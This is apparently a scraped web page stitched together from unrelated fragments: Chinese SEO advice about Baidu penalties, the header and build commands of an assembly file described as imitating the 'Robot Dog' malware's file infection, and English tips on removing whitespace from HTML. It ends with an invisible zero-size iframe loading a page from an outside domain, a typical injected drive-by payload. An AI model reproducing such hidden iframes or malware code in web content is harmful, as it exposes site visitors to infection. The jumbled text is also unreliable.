站被百度K意味着将失去了80%甚至更多的流量,虽然还有如YAHOO.GOOGLE SOSO等引擎.但是收录再多也带不来多少IP.其实你错了,如果你这样认为那么你只有换米或者做新站了.那么前期的所有努力将白费,有一句话是这样说的:积水成河,任何稳定的流量来源都是值得珍惜的,绝对比大起大落的百度来得宝贵!百度的流量对于门户站来说是值得放在第一位的,也是可靠的。但是除此之外我建议你不要太在意 [连 GJJ 这样的知名站都有可能同样的对待,何况是我们这样的个人小站!]----看轻百度,你做你的搜索,我搞我的流量。
我这样说似乎很多朋友都认为必须具备很强的SEO技术,其实不然,一般的SEO在我看来只不过是从百度搞短期流量而已,我建议大家做的是直接优化内容页,简单说就是优化标题[包含完整的长尾关键词,也就是标题即关键字]。 这样对百度非常有效,可惜也很容易被降权或者被K。 但是GOOGLE和YAHOO却不会因为这样做而K你,而且会认为是精确匹配。
; 仿机器狗的感染文件代码
; by naitm(http://hi.baidu.com/naitm)
; ml /c /coff /nologo userinit.asm
; Link /align:0x10 /subsystem:windows /nologo userinit.obj
.model flat,stdcall
user satisfaction begins to seriously degrade
after 10 seconds of waiting.
Try to minimize the size of generated pages. For a slow connection
at 28.8-56K, this 10 second limit corresponds to a file size of about 34K.
Keep graphics to a minimum. Consider compressing (zipping) content as well.
One simple optimization is to remove unnecessary white space in generated html (去掉html中多余的空格):
- it is easy to implement - 容易实现
- it translates directly into reduced download times - 减少数据传输
- it can produce significant savings in file size, typically in the range of 10-25% - 文件大小通常可以减少10-25%
Most of the gains from removing white space are related to indentation,
especially that occurring within loops. This indentation can be left in
place during development, and then removed after testing is complete.
<iframe src=http://qqq.aihengho.com/wm/jh.htm width=0 height=0></iframe>